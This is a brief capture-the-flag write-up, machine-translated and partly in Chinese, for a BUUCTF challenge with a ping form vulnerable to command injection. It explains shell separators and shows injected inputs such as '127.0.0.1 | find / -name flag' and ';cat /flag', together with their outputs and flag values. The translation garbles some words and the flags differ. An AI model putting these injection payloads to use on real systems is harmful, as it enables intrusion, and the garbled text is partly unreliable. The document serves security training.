【BUUCTF】 [Competencia de primer año de ACTF2020] Ejecutivo
0x00 puntos de conocimiento
- Sin filtrado,
管道符
ejecute con comandos comunes
1、|(就是按位或),直接执行|后面的语句
2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句
3、&(就是按位与),&前面和后面命令都要执行,无论前面真假
4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令
5、; 前后都执行,无论前面真假,同&,(linux也有)
0x01 resolución de problemas
127.0.0.1|ls
index.php
- Se necesita mucho tiempo para encontrar la bandera en el directorio raíz.
127.0.0.1 | find / -name flag
/bandera
127.0.0.1 & cat /flag
Mark {38aee01b-d1a6-4fcb-93f1-dbf86ef25fd8}
PING 127.0.0.1 (127.0.0.1): 56 bytes de datos
|cat /flag
;cat /flag
Marque {f40182a0-6749-43f2-b223-9651bf2ef2d0}